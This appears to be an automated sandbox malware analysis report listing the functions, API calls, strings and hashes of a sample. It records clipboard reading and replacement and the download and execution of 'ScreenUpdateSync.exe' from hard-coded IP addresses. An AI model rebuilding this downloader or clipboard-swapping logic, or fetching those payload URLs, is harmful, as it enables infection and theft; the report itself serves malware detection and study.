GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Welding.pifPID: 7964, Parent PID: 7600COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.3%
Total number of Nodes:	772
Total number of Limit Nodes:	23

Executed Functions

Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016EA
Sleep.KERNEL32(000016FC,0000004C), ref: 004016F4

Part of subcall function 0040DAF3: _strlen.LIBCMT ref: 0040DB0A

OpenClipboard.USER32(00000000), ref: 00401721
GetClipboardData.USER32(00000001), ref: 00401731
GlobalLock.KERNEL32(00000000), ref: 00401740
_strlen.LIBCMT ref: 0040174D
_strlen.LIBCMT ref: 0040177C
_strlen.LIBCMT ref: 004018C0
EmptyClipboard.USER32 ref: 004018D6
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
GlobalLock.KERNEL32(00000000), ref: 00401901
GlobalUnlock.KERNEL32(00000000), ref: 0040190D
SetClipboardData.USER32(00000001,00000000), ref: 00401916
GlobalFree.KERNEL32(00000000), ref: 0040191D
CloseClipboard.USER32 ref: 00401941
Sleep.KERNEL32(000002C7), ref: 0040194C

Strings

i, xrefs: 0040175D

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: eab09452124598beb0b4e334ecf2048ea48312ab8d66a3bef69a3bab3f880271
Instruction ID: 0fee9e627e5c42b44934485084acdc2dd1baaf7dda83551ef156719203217bf2
Opcode Fuzzy Hash: eab09452124598beb0b4e334ecf2048ea48312ab8d66a3bef69a3bab3f880271
Instruction Fuzzy Hash: 7251C271800344DAE705EBA5EC06BAD7774FF19306F04517AE901722B3EB789B84C66D

Function 0040294F Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402972
InternetOpenUrlW.WININET(00000000,http://62.204.41.151/ScreenUpdateSync.exe,00000000,00000000,00000000,00000000), ref: 00402988
GetTempPathW.KERNEL32(00000105,?), ref: 004029A4
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 004029BA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004029F3
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402A2F
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402A4C
CloseHandle.KERNEL32(00000000), ref: 00402A62
ShellExecuteExW.SHELL32(?), ref: 00402AC3
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402AD8
CloseHandle.KERNEL32(?), ref: 00402AE4
InternetCloseHandle.WININET(00000000), ref: 00402AED
InternetCloseHandle.WININET(00000000), ref: 00402AF0

Strings

.exe, xrefs: 004029C6
ShareScreen, xrefs: 0040296D
<, xrefs: 00402AA0
http://62.204.41.151/ScreenUpdateSync.exe, xrefs: 00402986

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen$http://62.204.41.151/ScreenUpdateSync.exe
API String ID: 3323492106-1798614884
Opcode ID: c05395ee11054c14792961a37d211b6f0508d971ee1ecfe92137854c662757f4
Instruction ID: 88179dcb23b568ba83dd7ffc91621628a8df84d11df4635e3f5855bf42b6fd70
Opcode Fuzzy Hash: c05395ee11054c14792961a37d211b6f0508d971ee1ecfe92137854c662757f4
Instruction Fuzzy Hash: 4D41757190021CAFEB209B55DD85FEA77FCFF44345F0080B6B645A2190DEB49E858FA4

Function 0043E458 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043E126: CreateFileW.KERNEL32(00000000,00000000,?,0043E501,?,?,00000000,?,0043E501,00000000,0000000C), ref: 0043E143

GetLastError.KERNEL32 ref: 0043E56C
__dosmaperr.LIBCMT ref: 0043E573
GetFileType.KERNEL32(00000000), ref: 0043E57F
GetLastError.KERNEL32 ref: 0043E589
__dosmaperr.LIBCMT ref: 0043E592
CloseHandle.KERNEL32(00000000), ref: 0043E5B2
CloseHandle.KERNEL32(?), ref: 0043E6FC
GetLastError.KERNEL32 ref: 0043E72E
__dosmaperr.LIBCMT ref: 0043E735

Strings

H, xrefs: 0043E6BA

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: aad409d89611d51be5d03924cd351fd373ec27fc1c6361430db50182cfc66849
Instruction ID: 396262dc03b5e0abfdd3f17a5ee757123b12a5dd111fef7303b76a6621860084
Opcode Fuzzy Hash: aad409d89611d51be5d03924cd351fd373ec27fc1c6361430db50182cfc66849
Instruction Fuzzy Hash: 5EA12732A041549FDF19EFA9DC527AE7BA0AB0A324F14116EF8019B3D1DB38DD12CB59

Function 0043427D Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 116af529b34cd5344e24cd719be3ff8b1d7a6181dfff823d53077fc55eb08449
Instruction ID: 79804a5436fefcd0b881aa175e499ec1f381822d7d72dd6e2cbced57ec7fc76a
Opcode Fuzzy Hash: 116af529b34cd5344e24cd719be3ff8b1d7a6181dfff823d53077fc55eb08449
Instruction Fuzzy Hash: 81C11774E04345AFDB11DFA9D841BEEBBB4AF8E314F1411AAE50097392C738A941CB29

Function 00406092 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004060A6
__Mtx_init.LIBCPMT ref: 004060CC
std::_Cnd_initX.LIBCPMT ref: 004060EF
__Thrd_start.LIBCPMT ref: 00406114
std::_Cnd_waitX.LIBCPMT ref: 00406134
std::_Cnd_initX.LIBCPMT ref: 00406161

Strings

T6E, xrefs: 00406103, 0040610D

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID: T6E
API String ID: 1687354797-459176724
Opcode ID: 877ec7023a847760ec5bf6dc83d4ee7a195d972647e5afd33cbdaa341fcd1070
Instruction ID: e27aeb656dcb672889eb7507e3702c3c8578199a0d929d206d0c77956a30b362
Opcode Fuzzy Hash: 877ec7023a847760ec5bf6dc83d4ee7a195d972647e5afd33cbdaa341fcd1070
Instruction Fuzzy Hash: 3E218272C04209AADF11EBE59841BDEB7F8AF48328F14406FE405B72C2DB7C8A54C769

Function 004030D4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 70
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 004030F7
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040315D
InternetCloseHandle.WININET(00000000), ref: 0040316E
InternetCloseHandle.WININET(00000000), ref: 00403171

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00403115
ShareScreen, xrefs: 004030F2
&cc=DE, xrefs: 0040313A

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Internet$CloseHandleOpen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 435140893-1501832161
Opcode ID: c133b3f306e365734695787ff67df9acdc95d04c00812ebb1011ff9604e6ee99
Instruction ID: 5a34192665d4d05ed759a5a1bb36fb96f972170d34cdf451cce818d8e2b455e9
Opcode Fuzzy Hash: c133b3f306e365734695787ff67df9acdc95d04c00812ebb1011ff9604e6ee99
Instruction Fuzzy Hash: FE1194F5A0021C7EE700AB719C89E7B776CDB45785F5005B67911E2151D978DE048664

Function 004066C2 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 004066DE
__Cnd_signal.LIBCPMT ref: 004066EA
std::_Cnd_initX.LIBCPMT ref: 004066FF
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00406706

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 4f11de62d5dbf5593eb73ab3c73390914f561f6ed71d7d19791ab0836b4b55ef
Instruction ID: ac7a7731aeb4006b95c0ec39d3cb7214c7acf2898899c5322b295b011c34cbb0
Opcode Fuzzy Hash: 4f11de62d5dbf5593eb73ab3c73390914f561f6ed71d7d19791ab0836b4b55ef
Instruction Fuzzy Hash: 89F082314007019BE7213762D80774A77A0AF4032DF10483EF455665E2CFFEA8949A5D

Function 004028BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 004028EA
__fassign.LIBCMT ref: 004028FA

Part of subcall function 0040277E: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402861

Strings

o*@, xrefs: 0040293F

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID: o*@
API String ID: 2843524283-2776488119
Opcode ID: a13ddc6758087f2e94a3c7688604964f41d656627c7a8dc12b591eec5bed761c
Instruction ID: a6fb89b91363d35cfb4dfa64968dfd8fee65729413ad965221354ee4e0d8d538
Opcode Fuzzy Hash: a13ddc6758087f2e94a3c7688604964f41d656627c7a8dc12b591eec5bed761c
Instruction Fuzzy Hash: 9201BEB1E0111C56D725E625EC46AEF7764DB45314F0001EEA605E31C1D9745E85CAD4

Function 0042F03C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00459150,00000010,00000003,00432FDD), ref: 0042F04F
ExitThread.KERNEL32 ref: 0042F056

Strings

/4@, xrefs: 0042F08B

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: /4@
API String ID: 1611280651-27683496
Opcode ID: 271f498943b3e0827731f6d5d59aacaefab41908d11e48fd6a5e3352cbd20ae6
Instruction ID: aa24b067ded24f17623da0697395578f68b0052404ec1d0b15e1bf51c15f7220
Opcode Fuzzy Hash: 271f498943b3e0827731f6d5d59aacaefab41908d11e48fd6a5e3352cbd20ae6
Instruction Fuzzy Hash: A8F0FF74600215AFDB00AFB0E80AB6E3770FF49704F50426EF4055B392CB786914DB68

Function 0042F190 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002F03C,00000000,?,?), ref: 0042F1D9
GetLastError.KERNEL32(?,?,?,?,?,0040DDF1,00000000,00000000,?,?,00000000,?), ref: 0042F1E5
__dosmaperr.LIBCMT ref: 0042F1EC

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: d5a0064df807adda1f7b19c3ae466dfc508c22274c7f48d86703b9eef4e021ba
Instruction ID: 3093effe67c59ef7c03af1a91b2d1cf94cf60fff88a442c94bc30798328416ba
Opcode Fuzzy Hash: d5a0064df807adda1f7b19c3ae466dfc508c22274c7f48d86703b9eef4e021ba
Instruction Fuzzy Hash: 0F01C436300139EBCB159FA2FC05AAB3B79EF81324BD1007AF81492211DB358C29C7A8

Function 00435AA9 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00453810,?,?,?,?,00435B58,?,?,00000002,00000000), ref: 00435AE2
GetLastError.KERNEL32(?,00435B58,?,?,00000002,00000000,?,0043530A,?,00000000,00000000,00000002,?,?,?,?), ref: 00435AEC
__dosmaperr.LIBCMT ref: 00435AF3

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 2e3a40e517688e28386cbbaee62df1536d15eb675c34bf22af6cd717aab1fa6f
Instruction ID: f0131c6e6c6b2e8ef63de1d760bda637a156eccf398cdfb351792cb9f059b891
Opcode Fuzzy Hash: 2e3a40e517688e28386cbbaee62df1536d15eb675c34bf22af6cd717aab1fa6f
Instruction Fuzzy Hash: 97019C327109146FCB15AFA9EC45C6E7B39DBC9330F28136AF900CB290EA74EC119794

Function 0040307D Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040309F
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004030B7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 004030C7

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: db7b7581eab8fc2b6cf1d117637bce6accd31c35dee24a036b28ff49725416bc
Instruction ID: 4b293a55ab68151c5c59582975cd52d5bdf533ffde1c1458bfb98e04651da48f
Opcode Fuzzy Hash: db7b7581eab8fc2b6cf1d117637bce6accd31c35dee24a036b28ff49725416bc
Instruction Fuzzy Hash: ECF0B4B650011CFFEB214F94EC85EAB7A6CEB407E9F100075FB01B3150D2714E009664

Function 0042F0F0 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00432FDE: GetLastError.KERNEL32(?,?,?,0042FB4A,004360D0,?,00432F88,00000001,00000364,?,0042F061,00459150,00000010), ref: 00432FE3
Part of subcall function 00432FDE: _free.LIBCMT ref: 00433018
Part of subcall function 00432FDE: SetLastError.KERNEL32(00000000), ref: 0043304C

ExitThread.KERNEL32 ref: 0042F102
CloseHandle.KERNEL32(?,?,?,0042F222,?,?,0042F099,00000000), ref: 0042F12A
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042F222,?,?,0042F099,00000000), ref: 0042F140

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 239a5826c02709ec32c2f993b139b677b46d87cd9d11038b64732b6d453208ee
Instruction ID: 7a08457462d4e709d7a9806a4031f4f0eaf8a20653d902e1c2a80eeb6a36e75a
Opcode Fuzzy Hash: 239a5826c02709ec32c2f993b139b677b46d87cd9d11038b64732b6d453208ee
Instruction Fuzzy Hash: CBF0E930600260ABCB355B75E808B277AB8AF01364FD48735FC24C32A2DF78DC55865C

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002505), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.37/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A3

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.37/ScreenUpdateSync.exe
API String ID: 3358372957-2681926500
Opcode ID: f31eb5c92eacde5d448305b2ad122b12f688fed075fffa127fad827118439dbd
Instruction ID: 864fe202dc12ab6ae5488d6009ce96f4c5eff0c46753cf539fb59b422884c7ef
Opcode Fuzzy Hash: f31eb5c92eacde5d448305b2ad122b12f688fed075fffa127fad827118439dbd
Instruction Fuzzy Hash: 6831BB0666578095E228CBA3FC55B252770EF6C7A2F14743BD604CB2B2F3A19780C75E

Function 004354DA Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be9944be1cf76446fc345e8461a596f1323e80a919c121e237469fca5d1aa0c
Instruction ID: 23a47e64a6af241ddb5aa0140095fd1b40701105a13009158c0cb274d20b63c6
Opcode Fuzzy Hash: 2be9944be1cf76446fc345e8461a596f1323e80a919c121e237469fca5d1aa0c
Instruction Fuzzy Hash: 39511771A00604AFDB10DF28C841E6E7BF5EF89364F59916AE8099B391C739ED42CB54

Function 00403B12 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00403BEF

Memory Dump Source

Source File: 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_Welding.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 0cec611cc6d20601819052705e746a8b1ce95b82008cae145d3cf334c73c3f76
Instruction ID: 3a04f6f85c5ad4b5392bcd901d7a8cbacf77c13e285b9a43feb3a14357e3302a
Opcode Fuzzy Hash: 0cec611cc6d20601819052705e746a8b1ce95b82008cae145d3cf334c73c3f76
Instruction Fuzzy Hash: 24318E71604716AFC710CE2AC881A1ABFB8EB44319F04853FF854A3392C734EA548B8A

Function 0040277E Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402861

Memory Dump Source

